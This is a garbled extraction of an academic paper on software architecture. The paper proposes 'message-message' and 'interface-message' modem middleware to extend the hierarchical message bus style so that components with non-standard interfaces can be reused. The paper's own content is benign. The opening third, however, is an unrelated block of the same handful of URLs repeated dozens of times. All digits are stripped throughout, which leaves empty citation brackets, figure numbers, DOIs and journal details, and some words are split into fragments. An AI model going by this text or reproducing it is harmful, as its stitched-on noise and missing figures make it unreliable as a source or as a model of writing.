/discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html 
http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://dx.doi.org/ . /jneurosci. - . https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . 
d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . 
d /index.html https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . 
/ eo http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / 
international journal of advanced network, monitoring and controls volume , no. ,
doi: . /ijanmc- - improvement of architecture based on hierarchical message bus zhengwei wang, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: @qq.com; jinhui li, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: @qq.com; kun wang, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: @qq.com. abstract—the traditional architecture based on the hierarchical message bus has defects such as strict component requirements and a lack of support for reuse. the article introduces the message-message modem and the interface-message modem as construction middleware to propose a new hierarchical message bus. the new hierarchical message bus structure solves the problems that the hierarchical message bus architecture places overly strict requirements on system components and lacks reuse support for components that fail to provide the corresponding interfaces. firstly, the paper introduces the traditional hierarchical message bus architecture and its existing defects. secondly, the article proposes the new hierarchical message bus based on the hierarchical message bus architecture. finally, the article summarizes the new hierarchical message bus architecture proposed in this paper. keywords-hierarchical message bus; middleware; modem; new hierarchical message bus i. introduction one of the core questions of software architecture design is whether repeatable architecture patterns can be used, that is, whether software reuse can be achieved at the architecture level [ ]. the structure of a traditional architecture is mostly based on the c/s or hierarchical mode. although the c/s and hierarchical modes are easy to understand and highly efficient, they are highly specialized, extend only to some large systems in specific fields, and are not friendly to component reuse. in reality, there is often a need for an architecture with both a stable static structure and sufficient component reuse. based on the traditional hierarchical message bus structure, this paper further expands and improves the hierarchical message bus for different types of components and develops intermediate components with a wider application scope and better reusability, so as to maximize software reuse and achieve greater efficiency of component reuse. ii. key technology based on the traditional hierarchical message bus structure (hmb), this paper constructs two convenient middleware components, the message-message modem (mmm) and the interface-message modem (imm), for the conversion and adaptation of components with different interface standards, so as to achieve greater efficiency of component reuse. this article develops two general middleware: ) message-message modem (mmm): a non-standard component based on the message interconnection interface uses mmm middleware to send, receive, and parse messages exchanged with the message bus. ) interface-message modem (imm): a non-standard component invoked through interface calls uses imm middleware to complete the conversion and transmission between interface calls and messages. iii. architecture design a. traditional hierarchical message bus architecture the hierarchical message bus (hmb) architecture is a software architecture proposed by yang fuqing et al. [ ]. this architecture is based on a hierarchical message bus and supports the distribution and concurrency of components.
all components communicate through the message bus, as shown in figure . (figure . hierarchical message bus architecture diagram) the connector of the system is the message bus, which is responsible for the dispatch, delivery, and filtering of messages and for returning the processing results [ ]. the components in the system are all connected to the message bus and register with it the types of messages that interest them. a component sends out the corresponding message according to the needs of the system, and the message bus is responsible for dispatching that message to all components in the system interested in it. in the hmb architecture, the message is the only way for all components in the system to communicate. when a component receives a message from the message bus, it responds to the message according to its own state and then returns the corresponding processing result to the target component through the message bus [ ]. since all components in the system are connected through the message bus, it is not required that each component share the same address space or be limited to one machine, so this style is well suited to describing distributed concurrent systems. the system and the components that make it up are usually complicated, and it is difficult to obtain a complete understanding of them from one perspective, so a good software engineering method often models the system from multiple perspectives, generally including the static structure, the dynamic behavior, and the functions of the system [ ]. ) component model: the component model of hmb includes three parts: component interface, static structure and dynamic behavior, as shown in figure [ ]. (figure . component model of hmb architecture) the interface part of the component represents the set of interfaces supported by the component. common ones are the internal standard message interface, the external standard message interface, and the external interface, and each interface defines a set of input and output messages. the behavior part of the component is represented by a finite state automaton with output. when the component receives a message, the finite state automaton responds to the received message according to the current state, resulting in a state transition. the structural part of the component represents the internal structure of the composite component. a composite component is composed of atomic components and a local message bus, and several local components can be connected to the local message bus. the local message bus is a simplified representation of the message bus; the role of the message bus is to provide a unified integration mechanism for the entire system and for components at all levels. ) component interface: generally speaking, the component interface represents the interaction path between the component and the external environment.
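to make this component model concrete, the following is a minimal python sketch, not taken from the paper, of a component whose interface is the set of message types it receives and whose behavior is a finite state automaton with output; the class names, the transition-table encoding and the message fields are illustrative assumptions.

from dataclasses import dataclass

@dataclass
class Message:
    # a message carries a type name, an optional payload, and the sender's name
    msg_type: str
    payload: object = None
    sender: str = ""

class Component:
    # an hmb-style component: its interface is the set of message types it
    # responds to, and its behavior is a finite state automaton with output.
    # `transitions` maps (state, msg_type) -> (next_state, reply_type or None).
    def __init__(self, name, initial_state, transitions):
        self.name = name
        self.state = initial_state
        self.transitions = transitions
        self.interface = {msg_type for (_state, msg_type) in transitions}

    def handle(self, msg):
        # respond according to the current state, so the same message can
        # produce different responses at different times and in different states
        key = (self.state, msg.msg_type)
        if key not in self.transitions:
            return None
        next_state, reply_type = self.transitions[key]
        self.state = next_state
        return Message(reply_type, sender=self.name) if reply_type else None

for example, a hypothetical order-handling component could be declared as Component('order', 'idle', {('idle', 'create'): ('open', 'created'), ('open', 'pay'): ('paid', 'receipt')}), so that a 'pay' message only yields a reply once a 'create' message has already been processed.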
in the hmb architecture, the component interface is a message-based interconnection interface, where the interface represents the set of messages sent and received by the component, and the components communicate with each other through messages, which together constitute the component interface. in the general system defined by the interconnection interface, the connection between components is usually a fixed match between the requester of the service and the service provider, while in the system defined by the hmb architecture, the component has external messages after the response, it will cause a change of state. therefore, it can be found that, after receiving the same message, a component may have different responses at different times and in different states. ) message bus: the message bus is the connection of the system. in the system, all components form a component-message response registration form by registering the types of messages of interest to the message bus. the message bus locates the corresponding message based on the type of message it receives and the information in the component-message response registration table, passes the message to the corresponding responder, and is responsible for returning the processing result. when necessary, the message bus also needs to filter and block specific messages, as shown in figure . component_ component_ transfer message message bus attribute: component instance table component response table message filtering table services: message registration message dispatch message transfer message filtering figure . message bus structure diagram international journal of advanced network, monitoring and controls volume , no. , message registration: the component registers the response message set with the message bus. message dispatching and delivery: messages are passed between components through the message bus. the message bus dispatches messages to components interested in the message according to the component-message response registration form, and returns the processing results [ ]. message filtering: the message bus implements message filtering between components through message conversion or message blocking, to avoid message conflicts and message mismatch problems during component integration. through the above analysis, it can be found that the hmb architecture improves the degree of cohesion between the various components, while reducing the degree of coupling between the components, but there are still certain defects: first, if there is an existing well-functioning component, but due to the different form of the interface, it will not be used in this system, and it is necessary to re-develop the same functional component that fully complies with the interface standard, which is in line with the architectural style to improve software reuse development efficiency is contradictory. second, although the message filtering mechanism of the message bus has a certain message matching function, it can only process components that interact through messages, but not components that interact through interface calls, and it may be necessary to match different messages. modifying the design of the message bus has caused some instability to the system. third, the architectural style of hmb has too strict requirements on the components that make up the system. only strictly qualified components can be used, and there is a lack of reuse support for components that fail to provide corresponding interfaces. 
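for reference, the message filtering service described above, which converts or blocks specific message types via the filtering table, can be sketched as follows; the table layout and method names are assumptions of this example. the defects just listed are what motivate the improved architecture discussed next.

```python
class FilteringBus:
    """toy sketch of the filtering service: the message filtering table
    either converts a message type to another one or blocks it, so that
    mismatched components can still be integrated without conflicts."""

    def __init__(self):
        self.response_table = {}   # msg_type -> list of responders
        self.filter_table = {}     # msg_type -> converted type, or None to block

    def register(self, msg_type, responder):
        self.response_table.setdefault(msg_type, []).append(responder)

    def add_filter(self, msg_type, converted_type):
        self.filter_table[msg_type] = converted_type

    def dispatch(self, msg_type, payload=None):
        if msg_type in self.filter_table:
            msg_type = self.filter_table[msg_type]
            if msg_type is None:                  # blocked message
                return []
        return [respond(msg_type, payload)
                for respond in self.response_table.get(msg_type, [])]


bus = FilteringBus()
bus.register("save_document", lambda t, p: f"saved {p}")
bus.add_filter("store_document", "save_document")    # convert a mismatched type
bus.add_filter("debug_ping", None)                   # block a conflicting type
print(bus.dispatch("store_document", "report.txt"))  # ['saved report.txt']
print(bus.dispatch("debug_ping"))                    # []
```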
therefore, it is necessary to improve and expand the architecture based on the hierarchical message bus. b. new hierarchical message bus architecture composite component message bus (middleware) imm standard component mmm component component hierarchical message bus (connector) component component component �� immc immc figure . schematic diagram of the nhmb architecture this paper improves the traditional hmb architecture and becomes a new hmb architecture style (nhmb, new hierarchical message bus), as shown in figure below. compared with the traditional hmb architecture, the nhmb architecture adds non-standard components of interface-message modem and message-message modem and message interface. among them, the message-message modem (mmm), a non-standard international journal of advanced network, monitoring and controls volume , no. , component based on the message interconnection interface, uses mmm middleware to send and receive and parse messages between the component and the message bus. the interface-message modem (imm) calls the non-standard components of the interface and uses imm middleware to complete the conversion and transmission between the interface and the message. complex components in the system can be decomposed into relatively low-level subcomponents, which are connected through a local message bus [ ]. such complex components are called composite components. if the sub-components are still relatively complex, they can be further decomposed, and the decomposition continues in this way, and the entire system forms a tree-like topology. the end nodes of the tree structure are called leaf nodes. they are atomic components in the system and no longer contain subcomponents. the entire system can be used as a component to integrate into a larger system through a higher-level message bus. therefore, the entire system and the individual components that make up the system can be characterized in a unified manner. the improved nhmb architecture model in this paper is similar to the hmb structure, which has three parts: interface, static structure and dynamic behavior. interface: the interface in nhmb can be either the originally supported interface with message interaction function or an interface that only provides formal calls. static structure: the composite components in nhmb are also based on nhmb's architectural style, not the original hmb's architectural style. based on the above two changes, the architecture can greatly reduce the requirements for the specificity of components, so that existing components can be reused to a greater extent. ) component model: the improved nhmb architecture in this paper is similar to the hmb architecture, which has three parts: interface, static structure and dynamic behavior. action interface structure internal message external message hierarchical message bus (connector) modem component component non-standard message non-standard component figure . component model of nhmb architecture ) component interface: the nhmb architecture achieves the indirect use of such components by adding an interface-message modem or a message-message modem between the type of component and the message bus. from the overall system perspective, although a module is added to the system, it has no effect on other modules of the system. in addition, there is no need to modify the message bus. 
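the point made above, that adding a modem leaves the bus and the other modules untouched, can be seen in a short sketch: an existing interface-only component is wrapped by an interface-message modem and registered with the same kind of toy bus used for standard components. all names and the single-method wrapping are assumptions of this illustration.

```python
from collections import defaultdict

class MessageBus:
    """the same toy bus used for standard components; nothing in it has
    to change when a modem is added."""
    def __init__(self):
        self.response_table = defaultdict(list)
    def register(self, msg_type, responder):
        self.response_table[msg_type].append(responder)
    def dispatch(self, msg_type, payload=None):
        return [r(msg_type, payload) for r in self.response_table[msg_type]]


class LegacyLogger:
    """an existing, well-functioning component that only offers an
    ordinary call interface and knows nothing about messages."""
    def write(self, text):
        return f"logged: {text}"


class InterfaceMessageModem:
    """imm wrapper: receives bus messages on behalf of the legacy
    component, turns them into interface calls, and returns the result."""
    def __init__(self, component, method_name):
        self.component = component
        self.method_name = method_name
    def respond(self, msg_type, payload):
        return getattr(self.component, self.method_name)(payload)


bus = MessageBus()
bus.register("log", InterfaceMessageModem(LegacyLogger(), "write").respond)
print(bus.dispatch("log", "system started"))   # ['logged: system started']
```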
in a sense, the nhmb architecture can achieve the effect of supporting more types of components by adding corresponding middleware modules, thereby greatly improving the system development efficiency and system stability. ) modem middleware: in order to support non-standard components, this article adds interface-message modem or message-message modem middleware to complete the reception and analysis of messages in the system in the nhmb architecture. so as to better adapt to the development of software systems, and greatly reduce the complexity of software system development, maintaining the stability of the system. the working principle of the modem is shown in figure below. international journal of advanced network, monitoring and controls volume , no. , message bus (connector) component_a component_b component_interface message-message modem interface-message modem ms g_a ms g_b msg_a ms g_b ms g_a ms g_a msg_b ms g_b ms g_i ms g_i ms g_i ms g_i figure . message modem middleware component a, component b, and interface component send messages to the message bus together. component a and component b are standard components. component interface is an interface component. two different types of components first send their own characteristic messages msg_a , msg_b , msg_i to mmm and immm, then mmm and immm parse the message msg_a , msg_b , msg_i from the component according to the rules prescribed in advance with the standard component and interface component, and then repackage the message into msg_a according to the format that the message bus can handle. msg_b , msg_i , and forwarded to the corresponding message bus, so as to achieve indirect communication between component a, component b and interface component interface to the message bus, the process of returning messages is similar to the process of sending messages. ) structural characteristics of nhmb system: high robustness: the message-message modem/interface modem added in this paper has a strong resolution and modulation mechanism, and has strong fault handling and recovery capabilities for non-standard components based on the message interconnect interface. higher development efficiency: the system can use mature functional components, even if its interface does not meet the needs of the system, it can be easily integrated into the system by adding a simple modem. support the distributed operation of each functional module: since all components in the system interact through the message bus, the system can pass the messages of each module to each other without affecting the distributed concurrent operation. more secure: the nhmb architecture designed in this paper introduces a modem. in order to increase the security of the system and prevent the communication of the message bus from being maliciously destroyed, authentication and encryption are adopted in the nhmb architecture style to ensure the security of message transmission. the introduction of modem not only reduces the requirements for components, increases the range of component selection, improves the scalability of the system, but also provides a convenient way for the system to expand the security mechanism, that is, the modem developed at this time not only contains message interface matching it also provides special functions for encryption and decryption. 
easy to expand and maintain: each component in the system is independent of each other, so when expanding or modifying system functions, you can only operate the specific modules in it, without affecting other modules. iv. conclusion the nhmb architecture proposed in this paper has the advantages of high robustness, higher system development efficiency, easy expansion and easy maintenance. by adding two intermediate components of message-message modem and interface-message modem on the basis of the traditional hmb architecture the operation greatly reduces the complexity of software system development, maintains the stability of the system, and solves the problem that components with good functions cannot be used because of different interfaces, and the same functional components and hmb system that meet the interface standards need to be redeveloped the structure has too strict requirements on the components constituting the international journal of advanced network, monitoring and controls volume , no. , system, and lacks reuse support for components that fail to provide corresponding interfaces. references [ ] zhang yousheng. the third article of software architecture series-style of software architecture [j]. programmer, ( ): - . [ ] zhang shikun, wang lifu, chang xin, yang fuqing. software architecture description language based on hierarchical message bus [j]. chinese journal of electronics, ( ): - . [ ] zhang shikun, wang lifu, yang fuqing. software architecture style based on hierarchical message bus [j]. chinese 